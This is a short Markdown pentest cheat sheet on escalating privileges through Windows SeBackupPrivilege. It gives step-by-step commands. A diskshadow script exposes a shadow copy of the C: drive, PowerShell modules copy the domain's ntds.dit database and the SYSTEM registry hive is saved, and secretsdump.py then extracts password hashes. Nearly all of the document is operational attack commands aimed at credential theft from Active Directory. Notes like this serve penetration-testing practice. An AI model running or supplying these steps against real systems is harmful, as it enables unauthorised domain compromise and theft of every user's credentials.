30 lines
1.1 KiB
Markdown
30 lines
1.1 KiB
Markdown
# SEBackupPrivilege Escalation
|
|
|
|
* Check user privileges to escalate
|
|
|
|
## Usage
|
|
* Check `whoami /all`
|
|
* `SeBackupPrivilege` must be present
|
|
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
|
|
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
|
|
```sh
|
|
set metadata C:\tmp\tmp.cabs
|
|
set context persistent nowriters
|
|
add volume c: alias someAlias
|
|
create
|
|
expose %someAlias% h:
|
|
```
|
|
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
|
|
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
|
|
```sh
|
|
import-module .\SeBackupPrivilegeUtils.dll
|
|
import-module .\SeBackupPrivilegeCmdLets.dll
|
|
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
|
|
reg save HKLM\SYSTEM C:\tmp\system
|
|
```
|
|
* Downloads the files `ntds.dit` and `system`
|
|
* Extract the hashes via
|
|
```sh
|
|
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
|
|
```
|